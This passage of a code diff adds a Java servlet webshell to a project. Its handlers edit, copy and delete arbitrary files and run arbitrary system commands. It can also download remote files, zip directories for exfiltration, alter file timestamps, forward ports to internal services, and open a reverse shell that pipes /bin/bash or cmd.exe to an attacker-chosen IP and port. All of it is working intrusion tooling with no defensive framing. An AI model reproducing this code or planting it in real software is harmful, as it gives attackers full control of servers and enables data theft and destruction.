{ + throw e; + } + } + } + + private static class CopyInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String src = request.getParameter("src"); + String to = request.getParameter("to"); + InputStream in = null; + Object enter = JSession.getAttribute(ENTER); + if (enter == null) + in = new FileInputStream(new File(src)); + else { + ZipFile zf = new ZipFile((String) enter); + ZipEntry entry = zf.getEntry(src); + in = zf.getInputStream(entry); + } + BufferedInputStream input = new BufferedInputStream(in); + BufferedOutputStream output = new BufferedOutputStream( + new FileOutputStream(new File(to))); + byte[] d = new byte[1024]; + int len = input.read(d); + while (len != -1) { + output.write(d, 0, len); + len = input.read(d); + } + output.close(); + input.close(); + JSession.setAttribute(MSG, "Copy File Success!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e; + } + } + } + + private static class BottomInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + response + .getWriter() + .println( + "
Don't break my heart~" + + "
"); + } catch (Exception e) { + + throw e; + } + } + } + + private static class VCreateFileInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + String path = request.getParameter("filepath"); + File f = new File(path); + if (!f.isAbsolute()) { + String oldPath = path; + path = JSession.getAttribute(CURRENT_DIR).toString(); + if (!path.endsWith("/")) + path += "/"; + path += oldPath; + f = new File(path); + f.createNewFile(); + } else { + f.createNewFile(); + } + out + .println("
" + + "
" + + "

Create / Edit File »

" + + "" + + "

Current File (import new file name and new file)
" + + "

" + + "

File Content

" + + "

" + + "
" + "
"); + } catch (Exception e) { + + throw e; + } + } + } + + private static class VEditInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + String path = request.getParameter("filepath"); + String charset = request.getParameter("charset"); + Object enter = JSession.getAttribute(ENTER); + InputStream input = null; + if (enter != null) { + ZipFile zf = new ZipFile((String) enter); + ZipEntry entry = new ZipEntry(path); + input = zf.getInputStream(entry); + } else { + File f = new File(path); + if (!f.exists()) + return; + input = new FileInputStream(path); + } + + BufferedReader reader = null; + if (Util.isEmpty(charset) || charset.equals("ANSI")) + reader = new BufferedReader(new InputStreamReader(input)); + else + reader = new BufferedReader(new InputStreamReader(input, + charset)); + StringBuffer content = new StringBuffer(); + String s = reader.readLine(); + while (s != null) { + content.append(s + "\r\n"); + s = reader.readLine(); + } + reader.close(); + out + .println("
" + + "
" + + "

Create / Edit File »

" + + "" + + "

Current File (import new file name and new file)
" + + "

" + + "

File Content

" + "

"); + if (enter != null) + out + .println(""); + else + out + .println(""); + out + .println("

" + + "
" + "
"); + + } catch (Exception e) { + + throw e; + } + } + } + + private static class CreateFileInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + String path = request.getParameter("filepath"); + String content = request.getParameter("filecontent"); + String charset = request.getParameter("charset"); + BufferedWriter outs = null; + if (charset.equals("ANSI")) + outs = new BufferedWriter(new FileWriter(new File(path))); + else + outs = new BufferedWriter(new OutputStreamWriter( + new FileOutputStream(new File(path)), charset)); + outs.write(content, 0, content.length()); + outs.close(); + JSession + .setAttribute( + MSG, + "Save File " + + (new File(path)).getName() + + " With " + + charset + " Success!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e; + } + } + } + + private static class VEditPropertyInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + String filepath = request.getParameter("filepath"); + File f = new File(filepath); + if (!f.exists()) + return; + String read = f.canRead() ? "checked=\"checked\"" : ""; + String write = f.canWrite() ? "checked=\"checked\"" : ""; + Calendar cal = Calendar.getInstance(); + cal.setTimeInMillis(f.lastModified()); + + out + .println("
" + + "
" + + "

Set File Property »

" + + "

Current File (FullPath)

" + + " " + + "

" + + " Read " + + " Write " + + "

" + + "

Instead »" + + "year:" + + "" + + "month:" + + "" + + "day:" + + "" + + "" + + "hour:" + + "" + + "minute:" + + "" + + "second:" + + "" + + "

" + + "

" + + "
" + "
"); + } catch (Exception e) { + throw e; + } + } + } + + private static class EditPropertyInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String f = request.getParameter("file"); + File file = new File(f); + if (!file.exists()) + return; + + String year = request.getParameter("year"); + String month = request.getParameter("month"); + String date = request.getParameter("date"); + String hour = request.getParameter("hour"); + String minute = request.getParameter("minute"); + String second = request.getParameter("second"); + + Calendar cal = Calendar.getInstance(); + cal.set(Calendar.YEAR, Integer.parseInt(year)); + cal.set(Calendar.MONTH, Integer.parseInt(month) - 1); + cal.set(Calendar.DATE, Integer.parseInt(date)); + cal.set(Calendar.HOUR, Integer.parseInt(hour)); + cal.set(Calendar.MINUTE, Integer.parseInt(minute)); + cal.set(Calendar.SECOND, Integer.parseInt(second)); + if (file.setLastModified(cal.getTimeInMillis())) { + JSession.setAttribute(MSG, "Reset File Property Success!"); + } else { + JSession + .setAttribute(MSG, + "Reset File Property Failed!"); + } + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e; + } + } + } + + //VShell + private static class VsInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + String cmd = request.getParameter("command"); + String program = request.getParameter("program"); + if (cmd == null) { + if (ISLINUX) + cmd = "id"; + else + cmd = "cmd.exe /c set"; + } + if (program == null) + program = "cmd.exe /c net start > " + SHELL_DIR + + "/Log.txt"; + if (JSession.getAttribute(MSG) != null) { + Util.outMsg(out, JSession.getAttribute(MSG).toString()); + JSession.removeAttribute(MSG); + } + out + .println("" + + "
" + + "
" + + "

Execute Program »

" + + "

" + + "" + + "" + + "Parameter
" + + "" + + "

" + + "
" + + "
" + + "

Execute Shell »

" + + "

" + + "" + + "" + + "Parameter
" + + "" + + "

" + + "
" + + "
"); + } catch (Exception e) { + + throw e; + } + } + } + + private static class ShellInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + String type = request.getParameter("type"); + if (type.equals("command")) { + ((Invoker) ins.get("vs")).invoke(request, response, + JSession); + out.println("
"); + out.println("
");
+					String command = request.getParameter("command");
+					if (!Util.isEmpty(command)) {
+						Process pro = Runtime.getRuntime().exec(command);
+						BufferedReader reader = new BufferedReader(
+								new InputStreamReader(pro.getInputStream()));
+						String s = reader.readLine();
+						while (s != null) {
+							out.println(Util.htmlEncode(Util.getStr(s)));
+							s = reader.readLine();
+						}
+						reader.close();
+						reader = new BufferedReader(new InputStreamReader(pro
+								.getErrorStream()));
+						s = reader.readLine();
+						while (s != null) {
+							out.println(Util.htmlEncode(Util.getStr(s)));
+							s = reader.readLine();
+						}
+						reader.close();
+						out.println("
"); + } + } else { + String program = request.getParameter("program"); + if (!Util.isEmpty(program)) { + Process pro = Runtime.getRuntime().exec(program); + JSession.setAttribute(MSG, "Program Has Run Success!"); + ((Invoker) ins.get("vs")).invoke(request, response, + JSession); + } + } + } catch (Exception e) { + + throw e; + } + } + } + + private static class DownInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String path = request.getParameter("path"); + if (Util.isEmpty(path)) + return; + InputStream i = null; + Object enter = JSession.getAttribute(ENTER); + String fileName = null; + if (enter == null) { + File f = new File(path); + if (!f.exists()) + return; + fileName = f.getName(); + i = new FileInputStream(f); + } else { + ZipFile zf = new ZipFile((String) enter); + ZipEntry entry = new ZipEntry(path); + fileName = entry.getName().substring( + entry.getName().lastIndexOf("/") + 1); + i = zf.getInputStream(entry); + } + response.setHeader("Content-Disposition", + "attachment;filename=" + + URLEncoder.encode(fileName, PAGE_CHARSET)); + BufferedInputStream input = new BufferedInputStream(i); + BufferedOutputStream output = new BufferedOutputStream(response + .getOutputStream()); + byte[] data = new byte[1024]; + int len = input.read(data); + while (len != -1) { + output.write(data, 0, len); + len = input.read(data); + } + input.close(); + output.close(); + } catch (Exception e) { + + throw e; + } + } + } + + //VDown + private static class VdInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + String savepath = request.getParameter("savepath"); + String url = request.getParameter("url"); + if (Util.isEmpty(url)) + url = "http://www.baidu.com/"; + if (Util.isEmpty(savepath)) { + savepath = JSession.getAttribute(CURRENT_DIR).toString(); + } + if (!Util.isEmpty(JSession.getAttribute("done"))) { + Util.outMsg(out, "Download Remote File Success!"); + JSession.removeAttribute("done"); + } + out + .println("
" + + "
" + + "

Remote File DownLoad »

" + + "

" + + "" + + "

File   URL: " + + "

" + + "

Save Path: " + + "

" + + "" + + "

" + "
"); + } catch (Exception e) { + + throw e; + } + } + } + + private static class DownRemoteInvoker extends DefaultInvoker { + public boolean doBefore() { + return true; + } + + public boolean doAfter() { + return true; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String downFileUrl = request.getParameter("url"); + String savePath = request.getParameter("savepath"); + if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) + return; + URL downUrl = new URL(downFileUrl); + URLConnection conn = downUrl.openConnection(); + + File tempF = new File(savePath); + File saveF = tempF; + if (tempF.isDirectory()) { + String fName = downFileUrl.substring(downFileUrl + .lastIndexOf("/") + 1); + saveF = new File(tempF, fName); + } + BufferedInputStream in = new BufferedInputStream(conn + .getInputStream()); + BufferedOutputStream out = new BufferedOutputStream( + new FileOutputStream(saveF)); + byte[] data = new byte[1024]; + int len = in.read(data); + while (len != -1) { + out.write(data, 0, len); + len = in.read(data); + } + in.close(); + out.close(); + JSession.setAttribute("done", "d"); + ((Invoker) ins.get("vd")).invoke(request, response, JSession); + } catch (Exception e) { + + throw e; + } + } + } + + private static class IndexInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + ((Invoker) ins.get("filelist")).invoke(request, response, + JSession); + } catch (Exception e) { + + throw e; + } + } + } + + private static class MkDirInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String name = request.getParameter("name"); + File f = new File(name); + if (!f.isAbsolute()) { + String path = JSession.getAttribute(CURRENT_DIR).toString(); + if (!path.endsWith("/")) + path += "/"; + path += name; + f = new File(path); + } + f.mkdirs(); + JSession.setAttribute(MSG, "Make Directory Success!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e; + } + } + } + + private static class MoveInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + String src = request.getParameter("src"); + String target = request.getParameter("to"); + if (!Util.isEmpty(target) && !Util.isEmpty(src)) { + File file = new File(src); + if (file.renameTo(new File(target))) { + JSession.setAttribute(MSG, "Move File Success!"); + } else { + String msg = "Move File Failed!"; + if (file.isDirectory()) { + msg += "The Move Will Failed When The Directory Is Not Empty."; + } + JSession.setAttribute(MSG, msg); + } + response.sendRedirect(SHELL_NAME); + } + } catch (Exception e) { + + throw e; + } + } + } + + private static class RemoveDirInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String dir = request.getParameter("dir"); + File file = new File(dir); + if (file.exists()) { + deleteFile(file); + deleteDir(file); + } + + JSession.setAttribute(MSG, "Remove Directory Success!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e; + } + } + + public void deleteFile(File f) { + if (f.isFile()) { + f.delete(); + } else { + File[] list = f.listFiles(); + for (int i = 0; i < list.length; i++) { + File ff = list[i]; + deleteFile(ff); + } + } + } + + public void deleteDir(File f) { + File[] list = f.listFiles(); + if (list.length == 0) { + f.delete(); + } else { + for (int i = 0; i < list.length; i++) { + File ff = list[i]; + deleteDir(ff); + } + deleteDir(f); + } + } + } + + private static class PackBatchInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String files = request.getParameter("files"); + if (Util.isEmpty(files)) + return; + String saveFileName = request.getParameter("savefilename"); + File saveF = new File(JSession.getAttribute(CURRENT_DIR) + .toString(), saveFileName); + if (saveF.exists()) { + JSession.setAttribute(MSG, "The File \"" + saveFileName + + "\" Has Been Exists!"); + response.sendRedirect(SHELL_NAME); + return; + } + ZipOutputStream zout = new ZipOutputStream( + new BufferedOutputStream(new FileOutputStream(saveF))); + String[] arr = files.split(","); + for (int i = 0; i < arr.length; i++) { + String f = arr[i]; + File pF = new File(JSession.getAttribute(CURRENT_DIR) + .toString(), f); + ZipEntry entry = new ZipEntry(pF.getName()); + zout.putNextEntry(entry); + FileInputStream fInput = new FileInputStream(pF); + int len = 0; + byte[] buf = new byte[1024]; + while ((len = fInput.read(buf)) != -1) { + zout.write(buf, 0, len); + zout.flush(); + } + fInput.close(); + } + zout.close(); + JSession.setAttribute(MSG, "Pack Files Success!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e; + } + } + } + + private static class VPackConfigInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + String packfile = request.getParameter("packedfile"); + String currentd = JSession.getAttribute(CURRENT_DIR).toString(); + out + .println("
" + + "" + + "" + + "" + + " " + + " " + + " " + "

Pack Configuration >>

" + + "
" + + " " + + " " + + " " + + " " + + " " + + " " + + " " + " " + + "
" + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + "
Packed Dir
Save To
Ext Filter" + + " no Blacklist Whitelist" + + "
" + + "
Filesize Filter(KB) " + + " no greaterthanlessthan
Exclude Dir
" + + " " + + "
" + "
"); + } catch (Exception e) { + + throw e; + } + } + } + + private static class PackInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + private boolean config = false; + private String extFilter = "blacklist"; + private String[] fileExts = null; + private String sizeFilter = "no"; + private int filesize = 0; + private String[] exclude = null; + private String packFile = null; + + private void reset() { + this.config = false; + this.extFilter = "blacklist"; + this.fileExts = null; + this.sizeFilter = "no"; + this.filesize = 0; + this.exclude = null; + this.packFile = null; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String config = request.getParameter("config"); + if (!Util.isEmpty(config) && config.equals("true")) { + this.config = true; + this.extFilter = request.getParameter("extfilter"); + this.fileExts = request.getParameter("fileext").split(","); + this.sizeFilter = request.getParameter("sizefilter"); + this.filesize = Integer.parseInt(request + .getParameter("filesize")); + this.exclude = request.getParameter("exclude").split(","); + } + String packedFile = request.getParameter("packedfile"); + if (Util.isEmpty(packedFile)) + return; + this.packFile = packedFile; + String saveFileName = request.getParameter("savefilename"); + File saveF = null; + if (this.config) + saveF = new File(saveFileName); + else + saveF = new File(JSession.getAttribute(CURRENT_DIR) + .toString(), saveFileName); + if (saveF.exists()) { + JSession.setAttribute(MSG, "The File \"" + saveFileName + + "\" Has Been Exists!"); + response.sendRedirect(SHELL_NAME); + return; + } + File pF = new File(packedFile); + ZipOutputStream zout = null; + String base = ""; + if (pF.isDirectory()) { + if (pF.listFiles().length == 0) { + JSession + .setAttribute(MSG, + "No File To Pack ! Maybe The Directory Is Empty ."); + response.sendRedirect(SHELL_NAME); + this.reset(); + return; + } + zout = new ZipOutputStream(new BufferedOutputStream( + new FileOutputStream(saveF))); + zipDir(pF, base, zout); + } else { + zout = new ZipOutputStream(new BufferedOutputStream( + new FileOutputStream(saveF))); + zipFile(pF, base, zout); + } + zout.close(); + this.reset(); + JSession.setAttribute(MSG, "Pack File Success!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + throw e; + } + } + + public void zipDir(File f, String base, ZipOutputStream zout) + throws Exception { + if (f.isDirectory()) { + if (this.config) { + String curName = f.getAbsolutePath().replace('\\', '/'); + curName = curName.replaceAll("\\Q" + this.packFile + "\\E", + ""); + if (this.exclude != null) { + for (int i = 0; i < exclude.length; i++) { + if (!Util.isEmpty(exclude[i]) + && curName.startsWith(exclude[i])) { + return; + } + } + } + } + File[] arr = f.listFiles(); + for (int i = 0; i < arr.length; i++) { + File ff = arr[i]; + String tmpBase = base; + if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/")) + tmpBase += "/"; + zipDir(ff, tmpBase + f.getName(), zout); + } + } else { + String tmpBase = base; + if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/")) + tmpBase += "/"; + zipFile(f, tmpBase, zout); + } + + } + + public void zipFile(File f, String base, ZipOutputStream zout) + throws Exception { + if (this.config) { + String ext = f.getName().substring( + f.getName().lastIndexOf('.') + 1); + if (this.extFilter.equals("blacklist")) { + if (Util.exists(this.fileExts, ext)) { + return; + } + } else if (this.extFilter.equals("whitelist")) { + if (!Util.exists(this.fileExts, ext)) { + return; + } + } + if (!this.sizeFilter.equals("no")) { + double size = f.length() / 1024; + if (this.sizeFilter.equals("greaterthan")) { + if (size < filesize) + return; + } else if (this.sizeFilter.equals("lessthan")) { + if (size > filesize) + return; + } + } + } + ZipEntry entry = new ZipEntry(base + f.getName()); + zout.putNextEntry(entry); + FileInputStream fInput = new FileInputStream(f); + int len = 0; + byte[] buf = new byte[1024]; + while ((len = fInput.read(buf)) != -1) { + zout.write(buf, 0, len); + zout.flush(); + } + fInput.close(); + } + } + + private static class UnPackInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String savepath = request.getParameter("savepath"); + String zipfile = request.getParameter("zipfile"); + if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) + return; + File save = new File(savepath); + save.mkdirs(); + ZipFile file = new ZipFile(new File(zipfile)); + Enumeration e = file.entries(); + while (e.hasMoreElements()) { + ZipEntry en = (ZipEntry) e.nextElement(); + String entryPath = en.getName(); + int index = entryPath.lastIndexOf("/"); + if (index != -1) + entryPath = entryPath.substring(0, index); + File absEntryFile = new File(save, entryPath); + if (!absEntryFile.exists() + && (en.isDirectory() || en.getName().indexOf("/") != -1)) + absEntryFile.mkdirs(); + BufferedOutputStream output = null; + BufferedInputStream input = null; + try { + output = new BufferedOutputStream(new FileOutputStream( + new File(save, en.getName()))); + input = new BufferedInputStream(file.getInputStream(en)); + byte[] b = new byte[1024]; + int len = input.read(b); + while (len != -1) { + output.write(b, 0, len); + len = input.read(b); + } + } catch (Exception ex) { + } finally { + try { + if (output != null) + output.close(); + if (input != null) + input.close(); + } catch (Exception ex1) { + } + } + } + file.close(); + JSession.setAttribute(MSG, "UnPack File Success!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e; + } + } + } + + //VMapPort + private static class VmpInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + Object localIP = JSession.getAttribute("localIP"); + Object localPort = JSession.getAttribute("localPort"); + Object remoteIP = JSession.getAttribute("remoteIP"); + Object remotePort = JSession.getAttribute("remotePort"); + Object done = JSession.getAttribute("done"); + + JSession.removeAttribute("localIP"); + JSession.removeAttribute("localPort"); + JSession.removeAttribute("remoteIP"); + JSession.removeAttribute("remotePort"); + JSession.removeAttribute("done"); + + if (Util.isEmpty(localIP)) + localIP = InetAddress.getLocalHost().getHostAddress(); + if (Util.isEmpty(localPort)) + localPort = "3389"; + if (Util.isEmpty(remoteIP)) + remoteIP = "www.baidu.com"; + if (Util.isEmpty(remotePort)) + remotePort = "80"; + if (!Util.isEmpty(done)) + Util.outMsg(out, done.toString()); + + out + .println("
" + + "" + + " " + + " " + + " " + "" + "

PortMap >>

" + + "
" + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + " " + "

Local Ip :" + + " " + + " 		Local Port :" + + " Remote Ip :" + + " Remote Port :" + + "

" + + " " + + " " + + "
" + + "
" + "
" + + "
"); + String targetIP = request.getParameter("targetIP"); + String targetPort = request.getParameter("targetPort"); + String yourIP = request.getParameter("yourIP"); + String yourPort = request.getParameter("yourPort"); + if (Util.isEmpty(targetIP)) + targetIP = "127.0.0.1"; + if (Util.isEmpty(targetPort)) + targetPort = "3389"; + if (Util.isEmpty(yourIP)) + yourIP = request.getRemoteAddr(); + if (Util.isEmpty(yourPort)) + yourPort = "1234"; + out + .println("
" + + "" + + " " + + " " + + " " + "" + "

Port Back >>

" + + "
" + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + + " " + " " + "

Target Ip :" + + " " + + " 		Target Port :" + + " Your Ip :" + + " Your Port :" + + "

" + + " " + + "
" + + "
" + "
" + + "
"); + } catch (Exception e) { + + throw e; + } + } + } + + //StopMapPort + private static class SmpInvoker extends DefaultInvoker { + public boolean doAfter() { + return true; + } + + public boolean doBefore() { + return true; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + Object obj = JSession.getAttribute(PORT_MAP); + if (obj != null) { + ServerSocket server = (ServerSocket) JSession + .getAttribute(PORT_MAP); + server.close(); + } + JSession.setAttribute("done", "Stop Success!"); + ((Invoker) ins.get("vmp")).invoke(request, response, JSession); + } catch (Exception e) { + + throw e; + } + } + } + + //PortBack + private static class PortBackInvoker extends DefaultInvoker { + public boolean doAfter() { + return true; + } + + public boolean doBefore() { + return true; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String targetIP = request.getParameter("targetIP"); + String targetPort = request.getParameter("targetPort"); + String yourIP = request.getParameter("yourIP"); + String yourPort = request.getParameter("yourPort"); + Socket yourS = new Socket(); + yourS.connect(new InetSocketAddress(yourIP, Integer + .parseInt(yourPort))); + Socket targetS = new Socket(); + targetS.connect(new InetSocketAddress(targetIP, Integer + .parseInt(targetPort))); + StreamConnector.readFromLocal(new DataInputStream(targetS + .getInputStream()), new DataOutputStream(yourS + .getOutputStream())); + StreamConnector.readFromRemote(targetS, yourS, + new DataInputStream(yourS.getInputStream()), + new DataOutputStream(targetS.getOutputStream())); + JSession.setAttribute("done", "Port Back Success !"); + ((Invoker) ins.get("vmp")).invoke(request, response, JSession); + } catch (Exception e) { + + throw e; + } + } + } + + private static class MapPortInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + String localIP = request.getParameter("localIP"); + String localPort = request.getParameter("localPort"); + final String remoteIP = request.getParameter("remoteIP"); + final String remotePort = request.getParameter("remotePort"); + if (Util.isEmpty(localIP) || Util.isEmpty(localPort) + || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) + return; + Object obj = JSession.getAttribute(PORT_MAP); + if (obj != null) { + ServerSocket s = (ServerSocket) obj; + s.close(); + } + final ServerSocket server = new ServerSocket(); + server.bind(new InetSocketAddress(localIP, Integer + .parseInt(localPort))); + JSession.setAttribute(PORT_MAP, server); + new Thread(new Runnable() { + public void run() { + while (true) { + Socket soc = null; + Socket remoteSoc = null; + DataInputStream remoteIn = null; + DataOutputStream remoteOut = null; + DataInputStream localIn = null; + DataOutputStream localOut = null; + try { + soc = server.accept(); + remoteSoc = new Socket(); + remoteSoc + .connect(new InetSocketAddress( + remoteIP, Integer + .parseInt(remotePort))); + remoteIn = new DataInputStream(remoteSoc + .getInputStream()); + remoteOut = new DataOutputStream(remoteSoc + .getOutputStream()); + localIn = new DataInputStream(soc + .getInputStream()); + localOut = new DataOutputStream(soc + .getOutputStream()); + StreamConnector.readFromLocal(localIn, + remoteOut); + StreamConnector.readFromRemote(soc, remoteSoc, + remoteIn, localOut); + } catch (Exception ex) { + break; + } + } + } + + }).start(); + JSession.setAttribute("done", "Map Port Success!"); + JSession.setAttribute("localIP", localIP); + JSession.setAttribute("localPort", localPort); + JSession.setAttribute("remoteIP", remoteIP); + JSession.setAttribute("remotePort", remotePort); + JSession.setAttribute(SESSION_O, "vmp"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e; + } + } + } + + //VBackConnect + private static class VbcInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + Object ip = JSession.getAttribute("ip"); + Object port = JSession.getAttribute("port"); + Object program = JSession.getAttribute("program"); + Object done = JSession.getAttribute("done"); + JSession.removeAttribute("ip"); + JSession.removeAttribute("port"); + JSession.removeAttribute("program"); + JSession.removeAttribute("done"); + if (Util.isEmpty(ip)) + ip = request.getRemoteAddr(); + if (Util.isEmpty(port) || !Util.isInteger(port.toString())) + port = "1234"; + if (Util.isEmpty(program)) { + if (ISLINUX) + program = "/bin/bash"; + else + program = "cmd.exe"; + } + + if (!Util.isEmpty(done)) + Util.outMsg(out, done.toString()); + out + .println("
" + + "" + + " " + + " " + + " " + "" + "

Back Connect >>

" + + "
" + + " " + + " " + + " " + + " " + + " " + + " " + + " " + " " + "
Your Ip :" + + " " + + " Your Port :" + + " Program To Back :" + + "

" + + " " + + "
" + + "
" + "
" + + "
"); + } catch (Exception e) { + + throw e; + } + } + } + + private static class BackConnectInvoker extends DefaultInvoker { + public boolean doAfter() { + return false; + } + + public boolean doBefore() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String ip = request.getParameter("ip"); + String port = request.getParameter("port"); + String program = request.getParameter("program"); + if (Util.isEmpty(ip) || Util.isEmpty(program) + || !Util.isInteger(port)) + return; + Socket socket = new Socket(ip, Integer.parseInt(port)); + Process process = Runtime.getRuntime().exec(program); + (new StreamConnector(process.getInputStream(), socket + .getOutputStream())).start(); + (new StreamConnector(process.getErrorStream(), socket + .getOutputStream())).start(); + (new StreamConnector(socket.getInputStream(), process + .getOutputStream())).start(); + JSession.setAttribute("done", "Back Connect Success!"); + JSession.setAttribute("ip", ip); + JSession.setAttribute("port", port); + JSession.setAttribute("program", program); + JSession.setAttribute(SESSION_O, "vbc"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e; + } + } + } + + private static class JspEnvInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + out + .println("" + + " " + + " " + " " + + "

System Properties >>

" + + "
" + + "
" + + "
    "); + Properties pro = System.getProperties(); + Enumeration names = pro.propertyNames(); + while (names.hasMoreElements()) { + String name = (String) names.nextElement(); + out.println("
  • " + Util.htmlEncode(name) + " : " + + Util.htmlEncode(pro.getProperty(name)) + "
    • "); + } + out + .println("

System Environment >>

    "); + /* + Map envs = System.getenv(); + Set> entrySet = envs.entrySet(); + for (Map.Entry en:entrySet) { + out.println("
  • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
    • "); + }*/ + out + .println("
"); + } catch (Exception e) { + + throw e; + } + } + } + + private static class ReflectInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + String c = request.getParameter("Class"); + Class cls = null; + try { + if (!Util.isEmpty(c)) + cls = Class.forName(c); + } catch (ClassNotFoundException ex) { + Util.outMsg(out, "Class " + c + + " Not Found ! "); + } + out + .println("
" + + " " + + " " + + " " + + " " + + " " + "

Java Reflect >>

" + + " " + + " " + + " " + + " " + " " + + "
Class Name : " + + "
" + "
" + "
